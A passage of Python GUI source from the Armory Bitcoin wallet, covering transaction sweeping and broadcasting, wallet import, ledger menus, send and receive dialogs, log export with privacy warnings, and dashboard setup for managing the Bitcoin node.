'the transaction fee would be equal to or greater than the amount '
'swept.'
'<br><br>'
'<b>Balance of %s:</b> %s<br>'
'<b>Fee to sweep %s:</b> %s'
'<br><br>The sweep operation has been canceled.' % (pladdr, pladdr, \
coin2str(outVal+fee,maxZeros=0), pladdr, coin2str(fee,maxZeros=0)), \
QMessageBox.Ok)
LOGERROR('Sweep amount (%s) is less than fee needed for sweeping (%s)', \
coin2str(outVal+fee, maxZeros=0), coin2str(fee, maxZeros=0))
return
# Finally, if we got here, we're ready to broadcast!
if gt1:
dispIn = 'multiple addresses'
else:
dispIn = 'address <b>%s</b>' % sweepList[0].getAddrStr()
dispOut = 'wallet <b>"%s"</b> (%s) ' % (wlt.labelName, wlt.uniqueIDB58)
if DlgVerifySweep(dispIn, dispOut, outVal, fee).exec_():
self.broadcastTransaction(finishedTx, dryRun=False)
wlt.finishSweepScan(sweepList)
#############################################################################
def broadcastTransaction(self, pytx, dryRun=False):
if dryRun:
#DlgDispTxInfo(pytx, None, self, self).exec_()
return
else:
LOGRAWDATA(pytx.serialize(), logging.INFO)
LOGPPRINT(pytx, logging.INFO)
newTxHash = pytx.getHash()
LOGINFO('Sending Tx, %s', binary_to_hex(newTxHash))
self.NetworkingFactory.sendTx(pytx)
LOGINFO('Transaction sent to Satoshi client...!')
def sendGetDataMsg():
msg = PyMessage('getdata')
msg.payload.invList.append( [MSG_INV_TX, newTxHash] )
self.NetworkingFactory.sendMessage(msg)
def checkForTxInBDM():
# The sleep/delay makes sure we have time to receive a response
# but it also gives the user a chance to SEE the change to their
# balance occur. In some cases, that may be more satisfying than
# just seeing the updated balance when they get back to the main
# screen
if not TheBDM.bdv().getTxByHash(newTxHash).isInitialized():
LOGERROR('Transaction was not accepted by the Satoshi client')
LOGERROR('Raw transaction:')
LOGRAWDATA(pytx.serialize(), logging.ERROR)
LOGERROR('Transaction details')
LOGPPRINT(pytx, logging.ERROR)
searchstr = binary_to_hex(newTxHash, BIGENDIAN)
supportURL = 'https://bitcoinarmory.com/support'
blkexplURL = BLOCKEXPLORE_URL_TX % searchstr
blkexplURL_short = BLOCKEXPLORE_URL_TX % searchstr[:20]
QMessageBox.warning(self, tr('Transaction Not Accepted'), tr("""
The transaction that you just executed, does not
appear to have been accepted by the Bitcoin network yet.
This can happen for a variety of reasons.
<br><br>On some occasions the transaction actually will succeed
and this message is displayed prematurely. To confirm whether the
the transaction actually succeeded, you can try this direct link
to %(blockexplorer)s:
<br><br>
<a href="%(url)s">%(urlshort)s...</a>
<br><br>
If you do not see the
transaction on that webpage within one minute, it failed and you
should attempt to re-send it.
If it <i>does</i> show up, then you do not need to do anything
else -- it will show up in Armory as soon as it receives one
confirmation.
<br><br>If the transaction did fail, it is likely because the fee
is too low. Try again with a higher fee.
If the problem persists, go to "<i>Help</i>" and select
"<i>Submit Bug Report</i>". Or use "<i>File</i>" ->
"<i>Export Log File</i>" and then attach it to a support
ticket at
<a href="%(supporturl)s">%(supporturl)s</a>""") % {
'blockexplorer' : BLOCKEXPLORE_NAME, 'url' : blkexplURL, \
'urlshort' : blkexplURL_short, 'supporturl' : supportURL}, QMessageBox.Ok)
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Ledger)
# Send the Tx after a short delay, give the system time to see the Tx
# on the network and process it, and check to see if the Tx was seen.
# We may change this setup in the future, but for now....
reactor.callLater(3, sendGetDataMsg)
reactor.callLater(15, checkForTxInBDM)
#############################################################################
def warnNoImportWhileScan(self):
extraMsg = ''
if not self.usermode==USERMODE.Standard:
extraMsg = ('<br><br>' + \
tr('In the future, you may avoid scanning twice by '
'starting Armory in offline mode (--offline), and '
'perform the import before switching to online mode.'))
QMessageBox.warning(self, tr('Armory is Busy'), \
tr('Wallets and addresses cannot be imported while Armory is in '
'the middle of an existing blockchain scan. Please wait for '
'the scan to finish. ') + extraMsg, QMessageBox.Ok)
#############################################################################
def execImportWallet(self):
sdm = TheSDM.getSDMState()
bdm = TheBDM.getState()
if sdm in ['BitcoindInitializing', \
'BitcoindSynchronizing', \
'TorrentSynchronizing'] or \
bdm in [BDM_SCANNING]:
QMessageBox.warning(self, tr('Scanning'), tr("""
Armory is currently in the middle of scanning the blockchain for
your existing wallets. New wallets cannot be imported until this
operation is finished."""), QMessageBox.Ok)
return
DlgUniversalRestoreSelect(self, self).exec_()
#############################################################################
def execGetImportWltName(self):
fn = self.getFileLoad('Import Wallet File')
if not os.path.exists(fn):
return
wlt = PyBtcWallet().readWalletFile(fn, verifyIntegrity=False)
wltID = wlt.uniqueIDB58
wlt = None
if self.walletMap.has_key(wltID):
QMessageBox.warning(self, 'Duplicate Wallet!', \
'You selected a wallet that has the same ID as one already '
'in your wallet (%s)! If you would like to import it anyway, '
'please delete the duplicate wallet in Armory, first.'%wltID, \
QMessageBox.Ok)
return
fname = self.getUniqueWalletFilename(fn)
newpath = os.path.join(ARMORY_HOME_DIR, fname)
LOGINFO('Copying imported wallet to: %s', newpath)
shutil.copy(fn, newpath)
newWlt = PyBtcWallet().readWalletFile(newpath)
newWlt.fillAddressPool()
self.addWalletToApplication(newWlt)
#############################################################################
def digitalBackupWarning(self):
reply = QMessageBox.warning(self, 'Be Careful!', tr("""
<font color="red"><b>WARNING:</b></font> You are about to make an
<u>unencrypted</u> backup of your wallet. It is highly recommended
that you do <u>not</u> ever save unencrypted wallets to your regular
hard drive. This feature is intended for saving to a USB key or
other removable media."""), QMessageBox.Ok | QMessageBox.Cancel)
return (reply==QMessageBox.Ok)
#############################################################################
def execAddressBook(self):
if TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, 'Blockchain Not Ready', \
'The address book is created from transaction data available in '
'the blockchain, which has not finished loading. The address '
'book will become available when Armory is online.', QMessageBox.Ok)
elif TheBDM.getState() in (BDM_UNINITIALIZED,BDM_OFFLINE):
QMessageBox.warning(self, 'Blockchain Not Ready', \
'The address book is created from transaction data available in '
'the blockchain, but Armory is currently offline. The address '
'book will become available when Armory is online.', QMessageBox.Ok)
else:
if len(self.walletMap)==0:
QMessageBox.warning(self, 'No wallets!', 'You have no wallets so '
'there is no address book to display.', QMessageBox.Ok)
return
DlgAddressBook(self, self, None, None, None).exec_()
#############################################################################
def getUniqueWalletFilename(self, wltPath):
root,fname = os.path.split(wltPath)
base,ext = os.path.splitext(fname)
if not ext=='.wallet':
fname = base+'.wallet'
currHomeList = os.listdir(ARMORY_HOME_DIR)
newIndex = 2
while fname in currHomeList:
# If we already have a wallet by this name, must adjust name
base,ext = os.path.splitext(fname)
fname='%s_%02d.wallet'%(base, newIndex)
newIndex+=1
if newIndex==99:
raise WalletExistsError('Cannot find unique filename for wallet.'
'Too many duplicates!')
return fname
#############################################################################
def addrViewDblClicked(self, index, wlt):
uacfv = lambda x: self.updateAddressCommentFromView(self.wltAddrView, self.wlt)
#############################################################################
def dblClickLedger(self, index):
if index.column()==LEDGERCOLS.Comment:
self.updateTxCommentFromView(self.ledgerView)
else:
self.showLedgerTx()
#############################################################################
def showLedgerTx(self):
row = self.ledgerView.selectedIndexes()[0].row()
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txtime = unicode(self.ledgerView.model().index(row, LEDGERCOLS.DateStr).data().toString())
pytx = None
txHashBin = hex_to_binary(txHash)
cppTx = TheBDM.bdv().getTxByHash(txHashBin)
if cppTx.isInitialized():
pytx = PyTx().unserialize(cppTx.serialize())
if pytx==None:
QMessageBox.critical(self, 'Invalid Tx',
'The transaction you requested be displayed does not exist in '
'Armory\'s database. This is unusual...', QMessageBox.Ok)
return
DlgDispTxInfo( pytx, self.walletMap[wltID], self, self, txtime=txtime).exec_()
#############################################################################
def showContextMenuLedger(self):
menu = QMenu(self.ledgerView)
if len(self.ledgerView.selectedIndexes())==0:
return
row = self.ledgerView.selectedIndexes()[0].row()
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
txHash = hex_switchEndian(txHash)
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
actViewTx = menu.addAction("View Details")
actViewBlkChn = menu.addAction("View on %s" % BLOCKEXPLORE_NAME)
actComment = menu.addAction("Change Comment")
actCopyTxID = menu.addAction("Copy Transaction ID")
actOpenWallet = menu.addAction("Open Relevant Wallet")
action = menu.exec_(QCursor.pos())
if action==actViewTx:
self.showLedgerTx()
elif action==actViewBlkChn:
try:
webbrowser.open(BLOCKEXPLORE_URL_TX % txHash)
except:
LOGEXCEPT('Failed to open webbrowser')
QMessageBox.critical(self, 'Could not open browser', \
'Armory encountered an error opening your web browser. To view '
'this transaction on blockchain.info, please copy and paste '
'the following URL into your browser: '
'<br><br>%s' % (BLOCKEXPLORE_URL_TX % txHash), QMessageBox.Ok)
elif action==actCopyTxID:
clipb = QApplication.clipboard()
clipb.clear()
clipb.setText(txHash)
elif action==actComment:
self.updateTxCommentFromView(self.ledgerView)
elif action==actOpenWallet:
DlgWalletDetails(self.getSelectedWallet(), self.usermode, self, self).exec_()
#############################################################################
def getSelectedWallet(self):
wltID = None
if len(self.walletMap) > 0:
wltID = self.walletMap.keys()[0]
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect) > 0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
# Starting the send dialog with or without a wallet
return None if wltID == None else self.walletMap[wltID]
def clickSendBitcoins(self):
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
QMessageBox.warning(self, 'Offline Mode', \
'Armory is currently running in offline mode, and has no '
'ability to determine balances or create transactions. '
'<br><br>'
'In order to send coins from this wallet you must use a '
'full copy of this wallet from an online computer, '
'or initiate an "offline transaction" using a watching-only '
'wallet on an online computer.', QMessageBox.Ok)
return
elif TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, 'Armory Not Ready', \
'Armory is currently scanning the blockchain to collect '
'the information needed to create transactions. This typically '
'takes between one and five minutes. Please wait until your '
'balance appears on the main window, then try again.', \
QMessageBox.Ok)
return
selectionMade = True
if len(self.walletMap)==0:
reply = QMessageBox.information(self, 'No Wallets!', \
'You cannot send any bitcoins until you create a wallet and '
'receive some coins. Would you like to create a wallet?', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
else:
DlgSendBitcoins(self.getSelectedWallet(), self, self).exec_()
#############################################################################
def uriSendBitcoins(self, uriDict):
# Because Bitcoin-Qt doesn't store the message= field we have to assume
# that the label field holds the Tx-info. So we concatenate them for
# the display message
uri_has = lambda s: uriDict.has_key(s)
haveLbl = uri_has('label')
haveMsg = uri_has('message')
newMsg = ''
if haveLbl and haveMsg:
newMsg = uriDict['label'] + ': ' + uriDict['message']
elif not haveLbl and haveMsg:
newMsg = uriDict['message']
elif haveLbl and not haveMsg:
newMsg = uriDict['label']
descrStr = ''
descrStr = ('You just clicked on a "bitcoin:" link requesting bitcoins '
'to be sent to the following address:<br> ')
descrStr += '<br>--<b>Address</b>:\t%s ' % uriDict['address']
#if uri_has('label'):
#if len(uriDict['label'])>30:
#descrStr += '(%s...)' % uriDict['label'][:30]
#else:
#descrStr += '(%s)' % uriDict['label']
amt = 0
if uri_has('amount'):
amt = uriDict['amount']
amtstr = coin2str(amt, maxZeros=1)
descrStr += '<br>--<b>Amount</b>:\t%s BTC' % amtstr
if newMsg:
if len(newMsg)>60:
descrStr += '<br>--<b>Message</b>:\t%s...' % newMsg[:60]
else:
descrStr += '<br>--<b>Message</b>:\t%s' % newMsg
uriDict['message'] = newMsg
if not uri_has('amount'):
descrStr += ('<br><br>There is no amount specified in the link, so '
'you can decide the amount after selecting a wallet to use '
'for this this transaction. ')
else:
descrStr += ('<br><br><b>The specified amount <u>can</u> be changed</b> on the '
'next screen before hitting the "Send" button. ')
selectedWalletID = None
if len(self.walletMap)==0:
reply = QMessageBox.information(self, 'No Wallets!', \
'You just clicked on a "bitcoin:" link to send money, but you '
'currently have no wallets! Would you like to create a wallet '
'now?', QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return False
else:
DlgSendBitcoins(self.getSelectedWallet(), self, self, uriDict).exec_()
return True
#############################################################################
def clickReceiveCoins(self):
loading = None
QAPP.processEvents()
wltID = None
selectionMade = True
if len(self.walletMap)==0:
reply = QMessageBox.information(self, 'No Wallets!', \
'You have not created any wallets which means there is nowhere to '
'store you bitcoins! Would you like to create a wallet now?', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
elif len(self.walletMap)==1:
loading = LoadingDisp(self, self)
loading.show()
wltID = self.walletMap.keys()[0]
else:
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect)>0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
dlg = DlgWalletSelect(self, self, 'Receive coins with wallet...', '', \
firstSelect=wltID, onlyMyWallets=False)
if dlg.exec_():
loading = LoadingDisp(self, self)
loading.show()
wltID = dlg.selectedID
else:
selectionMade = False
if selectionMade:
wlt = self.walletMap[wltID]
wlttype = determineWalletType(wlt, self)[0]
if showRecvCoinsWarningIfNecessary(wlt, self, self):
QAPP.processEvents()
dlg = DlgNewAddressDisp(wlt, self, self, loading)
dlg.exec_()
#############################################################################
def sysTrayActivated(self, reason):
if reason==QSystemTrayIcon.DoubleClick:
self.bringArmoryToFront()
#############################################################################
def bringArmoryToFront(self):
self.show()
self.setWindowState(Qt.WindowActive)
self.activateWindow()
self.raise_()
#############################################################################
def minimizeArmory(self):
LOGDEBUG('Minimizing Armory')
self.hide()
self.sysTray.show()
#############################################################################
def startWalletWizard(self):
walletWizard = WalletWizard(self, self)
walletWizard.exec_()
#############################################################################
def startTxWizard(self, prefill=None, onlyOfflineWallets=False):
txWizard = TxWizard(self, self, self.getSelectedWallet(), prefill, onlyOfflineWallets=onlyOfflineWallets)
txWizard.exec_()
#############################################################################
def exportLogFile(self):
LOGDEBUG('exportLogFile')
reply = QMessageBox.warning(self, tr('Bug Reporting'), tr("""<qt>
As of version 0.91, Armory now includes a form for reporting
problems with the software. Please use
<i>"Help"</i>→<i>"Submit Bug Report"</i>
to send a report directly to the Armory team, which will include
your log file automatically.</qt>"""), QMessageBox.Ok | QMessageBox.Cancel)
if not reply==QMessageBox.Ok:
return
if self.logFilePrivacyWarning(wCancel=True):
self.saveCombinedLogFile()
#############################################################################
def getUserAgreeToPrivacy(self, getAgreement=False):
ptype = 'submitbug' if getAgreement else 'generic'
dlg = DlgPrivacyPolicy(self, self, ptype)
if not dlg.exec_():
return False
return dlg.chkUserAgrees.isChecked()
#############################################################################
def logFileTriplePrivacyWarning(self):
return MsgBoxCustom(MSGBOX.Warning, tr('Privacy Warning'), tr("""
<b><u><font size=4>ATI Privacy Policy</font></u></b>
<br><br>
You should review the <a href="%s">Armory Technologies, Inc. privacy
policy</a> before sending any data to ATI servers.
<br><br>
<b><u><font size=3>Wallet Analysis Log Files</font></u></b>
<br><br>
The wallet analysis logs contain no personally-identifiable
information, only a record of errors and inconsistencies
found in your wallet file. No private keys or even public
keys are included.
<br><br>
<b><u><font size=3>Regular Log Files</font></u></b>
<br><br>
The regular log files do not contain any <u>security</u>-sensitive
information, but some users may consider the information to be
<u>privacy</u>-sensitive. The log files may identify some addresses
and transactions that are related to your wallets. It is always
recommended you include your log files with any request to the
Armory team, unless you are uncomfortable with the privacy
implications.
<br><br>
<b><u><font size=3>Watching-only Wallet</font></u></b>
<br><br>
A watching-only wallet is a copy of a regular wallet that does not
contain any signing keys. This allows the holder to see the balance
and transaction history of the wallet, but not spend any of the funds.
<br><br>
You may be requested to submit a watching-only copy of your wallet
to <i>Armory Technologies, Inc.</i> to make sure that there is no
risk to the security of your funds. You should not even consider
sending your
watching-only wallet unless it was specifically requested by an
Armory representative.""") % PRIVACY_URL, yesStr="&Ok")
#############################################################################
def logFilePrivacyWarning(self, wCancel=False):
return MsgBoxCustom(MSGBOX.Warning, tr('Privacy Warning'), tr("""
<b><u><font size=4>ATI Privacy Policy</font></u></b>
<br>
You should review the <a href="%s">Armory Technologies, Inc. privacy
policy</a> before sending any data to ATI servers.
<br><br>
Armory log files do not contain any <u>security</u>-sensitive
information, but some users may consider the information to be
<u>privacy</u>-sensitive. The log files may identify some addresses
and transactions that are related to your wallets.
<br><br>
<b>No signing-key data is ever written to the log file</b>.
Only enough data is there to help the Armory developers
track down bugs in the software, but it may still be considered
sensitive information to some users.
<br><br>
Please do not send the log file to the Armory developers if you
are not comfortable with the privacy implications! However, if you
do not send the log file, it may be very difficult or impossible
for us to help you with your problem.
<br><br><b><u>Advanced tip:</u></b> You can use
"<i>File</i>"\xe2\x86\x92"<i>Export Log File</i>" from the main
window to save a copy of the log file that you can manually
review."""), wCancel=wCancel, yesStr="&Ok")
#############################################################################
def saveCombinedLogFile(self, saveFile=None):
if saveFile is None:
# TODO: Interleave the C++ log and the python log.
# That could be a lot of work!
defaultFN = 'armorylog_%s.txt' % \
unixTimeToFormatStr(RightNow(),'%Y%m%d_%H%M')
saveFile = self.getFileSave(title='Export Log File', \
ffilter=['Text Files (*.txt)'], \
defaultFilename=defaultFN)
if len(unicode(saveFile)) > 0:
fout = open(saveFile, 'wb')
fout.write(getLastBytesOfFile(ARMORY_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMCPP_LOG_FILE, 256*1024))
fout.close()
LOGINFO('Log saved to %s', saveFile)
#############################################################################
def blinkTaskbar(self):
self.activateWindow()
#############################################################################
def lookForBitcoind(self):
LOGDEBUG('lookForBitcoind')
if satoshiIsAvailable():
return 'Running'
self.setSatoshiPaths()
try:
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
except:
LOGEXCEPT('Error setting up SDM')
pass
if TheSDM.failedFindExe:
return 'StillMissing'
return 'AllGood'
#############################################################################
def executeModeSwitch(self):
LOGDEBUG('executeModeSwitch')
if TheSDM.getSDMState() == 'BitcoindExeMissing':
bitcoindStat = self.lookForBitcoind()
if bitcoindStat=='Running':
result = QMessageBox.warning(self, tr('Already running!'), tr("""
The Bitcoin software appears to be installed now, but it
needs to be closed for Armory to work. Would you like Armory
to close it for you?"""), QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
elif bitcoindStat=='StillMissing':
QMessageBox.warning(self, tr('Still Missing'), tr("""
The Bitcoin software still appears to be missing. If you
just installed it, then please adjust your settings to point
to the installation directory."""), QMessageBox.Ok)
self.startBitcoindIfNecessary()
elif self.doAutoBitcoind and not TheSDM.isRunningBitcoind():
if satoshiIsAvailable():
result = QMessageBox.warning(self, tr('Still Running'), tr("""
'Bitcoin-Qt is still running. Armory cannot start until
'it is closed. Do you want Armory to close it for you?"""), \
QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
else:
self.startBitcoindIfNecessary()
elif TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
#self.resetBdmBeforeScan()
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
else:
LOGERROR('ModeSwitch button pressed when it should be disabled')
time.sleep(0.3)
self.setDashboardDetails()
#############################################################################
def setupDashboard(self):
LOGDEBUG('setupDashboard')
self.lblBusy = QLabel('')
if OS_WINDOWS:
# Unfortunately, QMovie objects don't work in Windows with py2exe
# had to create my own little "Busy" icon and hook it up to the
# heartbeat
self.lblBusy.setPixmap(QPixmap(':/loadicon_0.png'))
self.numHeartBeat = 0
def loadBarUpdate():
if self.lblBusy.isVisible():
self.numHeartBeat += 1
self.lblBusy.setPixmap(QPixmap(':/loadicon_%d.png' % \
(self.numHeartBeat%6)))
self.extraHeartbeatAlways.append(loadBarUpdate) # TODO - Remove this. Put the method in the handle CPP Notification event handler
else:
self.qmov = QMovie(':/busy.gif')
self.lblBusy.setMovie( self.qmov )
self.qmov.start()
self.btnModeSwitch = QPushButton('')
self.connect(self.btnModeSwitch, SIGNAL('clicked()'), \
self.executeModeSwitch)
# Will switch this to array/matrix of widgets if I get more than 2 rows
self.lblDashModeTorrent = QRichLabel('',doWrap=False)
self.lblDashModeSync = QRichLabel('',doWrap=False)
self.lblDashModeBuild = QRichLabel('',doWrap=False)
self.lblDashModeScan = QRichLabel('',doWrap=False)
self.lblDashModeTorrent.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeSync.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeBuild.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeScan.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.barProgressTorrent = QProgressBar(self)
self.barProgressSync = QProgressBar(self)
self.barProgressBuild = QProgressBar(self)
self.barProgressScan = QProgressBar(self)
self.barProgressTorrent.setRange(0,100)
self.barProgressSync.setRange(0,100)
self.barProgressScan.setRange(0,100)
self.lblTorrentStats = QRichLabel('', hAlign=Qt.AlignHCenter)
twid = relaxedSizeStr(self,'99 seconds')[0]
self.lblTimeLeftTorrent = QRichLabel('')
self.lblTimeLeftSync = QRichLabel('')
self.lblTimeLeftBuild = QRichLabel('')
self.lblTimeLeftScan = QRichLabel('')
self.lblTimeLeftSync.setMinimumWidth(twid)
self.lblTimeLeftScan.setMinimumWidth(twid)
self.lblStatsTorrent = QRichLabel('')
layoutDashMode = QGridLayout()
layoutDashMode.addWidget(self.lblDashModeTorrent, 0,0)
layoutDashMode.addWidget(self.barProgressTorrent, 0,1)
layoutDashMode.addWidget(self.lblTimeLeftTorrent, 0,2)
layoutDashMode.addWidget(self.lblTorrentStats, 1,0)
layoutDashMode.addWidget(self.lblDashModeSync, 2,0)
layoutDashMode.addWidget(self.barProgressSync, 2,1)
layoutDashMode.addWidget(self.lblTimeLeftSync, 2,2)
layoutDashMode.addWidget(self.lblDashModeBuild, 3,0)
layoutDashMode.addWidget(self.barProgressBuild, 3,1)
layoutDashMode.addWidget(self.lblTimeLeftBuild, 3,2)
layoutDashMode.addWidget(self.lblDashModeScan, 4,0)
layoutDashMode.addWidget(self.barProgressScan, 4,1)
layoutDashMode.addWidget(self.lblTimeLeftScan, 4,2)
layoutDashMode.addWidget(self.lblBusy, 0,3, 5,1)
layoutDashMode.addWidget(self.btnModeSwitch, 0,3, 5,1)
self.frmDashModeSub = QFrame()
self.frmDashModeSub.setFrameStyle(STYLE_SUNKEN)
self.frmDashModeSub.setLayout(layoutDashMode)
self.frmDashMode = makeHorizFrame(['Stretch', \
self.frmDashModeSub, \
'Stretch'])
self.lblDashDescr1 = QRichLabel('')
self.lblDashDescr2 = QRichLabel('')
for lbl in [self.lblDashDescr1, self.lblDashDescr2]:
# One textbox above buttons, one below
lbl.setStyleSheet('padding: 5px')
qpal = lbl.palette()
qpal.setColor(QPalette.Base, Colors.Background)
lbl.setPalette(qpal)
lbl.setOpenExternalLinks(True)
# Set up an array of buttons in the middle of the dashboard, to be used
# to help the user install bitcoind.
self.lblDashBtnDescr = QRichLabel('')
self.lblDashBtnDescr.setOpenExternalLinks(True)
BTN,LBL,TTIP = range(3)
self.dashBtns = [[None]*3 for i in range(5)]
self.dashBtns[DASHBTNS.Close ][BTN] = QPushButton('Close Bitcoin Process')
self.dashBtns[DASHBTNS.Install ][BTN] = QPushButton('Download Bitcoin')
self.dashBtns[DASHBTNS.Browse ][BTN] = QPushButton('Open www.bitcoin.org')
self.dashBtns[DASHBTNS.Instruct][BTN] = QPushButton('Installation Instructions')
self.dashBtns[DASHBTNS.Settings][BTN] = QPushButton('Change Settings')
# The "Now shutting down" frame
self.lblShuttingDown = QRichLabel('', doWrap=False)
self.lblShuttingDown.setText(tr('Preparing to shut down..'), \
size=4, bold=True, color='Foreground')
self.lblShuttingDown.setAlignment(Qt.AlignCenter | Qt.AlignVCenter)
layoutDashExit = QGridLayout()
layoutDashExit.addWidget(self.lblShuttingDown, 0,0, 0, 1)
self.frmDashSubExit = QFrame()
self.frmDashSubExit.setFrameStyle(STYLE_SUNKEN)
self.frmDashSubExit.setLayout(layoutDashExit)
self.frmDashSubExit = makeHorizFrame(['Stretch', \
self.frmDashSubExit, \
'Stretch'])
#####
def openBitcoinOrg():
webbrowser.open('http://www.bitcoin.org/en/download')
#####
def openInstruct():
if OS_WINDOWS:
webbrowser.open('https://www.bitcoinarmory.com/install-windows/')
elif OS_LINUX:
webbrowser.open('https://www.bitcoinarmory.com/install-linux/')
elif OS_MACOSX:
webbrowser.open('https://www.bitcoinarmory.com/install-macosx/')
self.connect(self.dashBtns[DASHBTNS.Close][BTN], SIGNAL('clicked()'), \
self.closeExistingBitcoin)
self.connect(self.dashBtns[DASHBTNS.Install][BTN], SIGNAL('clicked()'), \
self.openDLSatoshi)
self.connect(self.dashBtns[DASHBTNS.Browse][BTN], SIGNAL('clicked()'), \
openBitcoinOrg)
self.connect(self.dashBtns[DASHBTNS.Settings][BTN], SIGNAL('clicked()'), \
self.openSettings)
#self.connect(self.dashBtns[DASHBTNS.Instruct][BTN], SIGNAL('clicked()'), \
#self.openInstructWindow)
self.dashBtns[DASHBTNS.Close][LBL] = QRichLabel( \
'Stop existing Bitcoin processes so that Armory can open its own')
self.dashBtns[DASHBTNS.Browse][LBL] = QRichLabel( \
'Open browser to Bitcoin webpage to download and install Bitcoin software')
self.dashBtns[DASHBTNS.Instruct][LBL] = QRichLabel( \
'Instructions for manually installing Bitcoin for operating system')
self.dashBtns[DASHBTNS.Settings][LBL] = QRichLabel( \
'Open Armory settings window to change Bitcoin software management')
self.dashBtns[DASHBTNS.Browse][TTIP] = self.createToolTipWidget( \
'Will open your default browser to http://www.bitcoin.org where you can '
'download the latest version of Bitcoin-Qt, and get other information '
'and links about Bitcoin, in general.')
self.dashBtns[DASHBTNS.Instruct][TTIP] = self.createToolTipWidget( \
'Instructions are specific to your operating system and include '
'information to help you verify you are installing the correct software')
self.dashBtns[DASHBTNS.Settings][TTIP] = self.createToolTipWidget(
'Change Bitcoin-Qt/bitcoind management settings or point Armory to '
'a non-standard Bitcoin installation')
self.dashBtns[DASHBTNS.Close][TTIP] = self.createToolTipWidget( \
'Armory has detected a running Bitcoin-Qt or bitcoind instance and '
'will force it to exit')
self.dashBtns[DASHBTNS.Install][BTN].setEnabled(False)
self.dashBtns[DASHBTNS.Install][LBL] = QRichLabel('')
self.dashBtns[DASHBTNS.Install][LBL].setText( \
'This option is not yet available yet!', color='DisableFG')
self.dashBtns[DASHBTNS.Install][TTIP] = QRichLabel('') # disabled
if OS_WINDOWS:
self.dashBtns[DASHBTNS.Install][BTN].setEnabled(True)
self.dashBtns[DASHBTNS.Install][LBL] = QRichLabel('')
self.dashBtns[DASHBTNS.Install][LBL].setText( \
'Securely download Bitcoin software for Windows %s' % OS_VARIANT[0])
self.dashBtns[DASHBTNS.Install][TTIP] = self.createToolTipWidget( \
'The downloaded files are cryptographically verified. '
'Using this option will start the installer, you will '
'have to click through it to complete installation.')
#self.lblDashInstallForMe = QRichLabel( \
#'Armory will download, verify, and start the Bitcoin installer for you')
#self.ttipInstallForMe = self.createToolTipWidget( \
#'Armory will download the latest version of the Bitcoin software '
#'for Windows and verify its digital signatures. You will have to '
#'click through the installation options.<u></u>')
elif OS_LINUX:
# Only display the install button if using a debian-based distro
dist = platform.linux_distribution()
if dist[0] in ['Ubuntu','LinuxMint'] or 'debian' in dist:
self.dashBtns[DASHBTNS.Install][BTN].setEnabled(True)
self.dashBtns[DASHBTNS.Install][LBL] = QRichLabel( tr("""
Download and Install Bitcoin Core for Ubuntu/Debian"""))
self.dashBtns[DASHBTNS.Install][TTIP] = self.createToolTipWidget( tr("""
'Will download and Bitcoin software and cryptographically verify it"""))
elif OS_MACOSX:
pass
else:
LOGERROR('Unrecognized OS!')
self.frmDashMgmtButtons = QFrame()
self.frmDashMgmtButtons.setFrameStyle(STYLE_SUNKEN)
layoutButtons = QGridLayout()
layoutButtons.addWidget(self.lblDashBtnDescr, 0,0, 1,3)
for r in range(5):
for c in range(3):
if c==LBL:
wMin = tightSizeNChar(self, 50)[0]
self.dashBtns[r][c].setMinimumWidth(wMin)
layoutButtons.addWidget(self.dashBtns[r][c], r+1,c)
self.frmDashMgmtButtons.setLayout(layoutButtons)
self.frmDashMidButtons = makeHorizFrame(['Stretch', \
self.frmDashMgmtButtons,
'Stretch'])
dashLayout = QVBoxLayout()
dashLayout.addWidget(self.frmDashSubExit)
dashLayout.addWidget(self.frmDashMode)
dashLayout.addWidget(self.lblDashDescr1)
dashLayout.addWidget(self.frmDashMidButtons )
dashLayout.addWidget(self.lblDashDescr2)
dashLayout.addWidget(self.lblDashDescr2)
frmInner = QFrame()
frmInner.setLayout(dashLayout)
self.dashScrollArea = QScrollArea()
self.dashScrollArea.setWidgetResizable(True)
self.dashScrollArea.setWidget(frmInner)
scrollLayout = QVBoxLayout()
scrollLayout.addWidget(self.dashScrollArea)
self.tabDashboard.setLayout(scrollLayout)
self.frmDashSubExit.setVisible(False)
#############################################################################
def setupAnnounceTab(self):
self.lblAlertStr = QRichLabel(tr("""
<font size=4><b>Announcements and alerts from <i>Armory Technologies,
Inc.</i></b></font>"""), doWrap=False, hAlign=Qt.AlignHCenter)
def checkUpd():
lastUpdate = self.announceFetcher.getLastSuccessfulFetchTime()
self.explicitCheckAnnouncements(5)
lastUpdate2 = self.announceFetcher.getLastSuccessfulFetchTime()
if lastUpdate==lastUpdate2:
QMessageBox.warning(self, tr('Not Available'), tr("""
Could not access the <font color="%s"><b>Armory
Technologies, Inc.</b></font> announcement feeder.
Try again in a couple minutes.""") % \
htmlColor('TextGreen'), QMessageBox.Ok)
else:
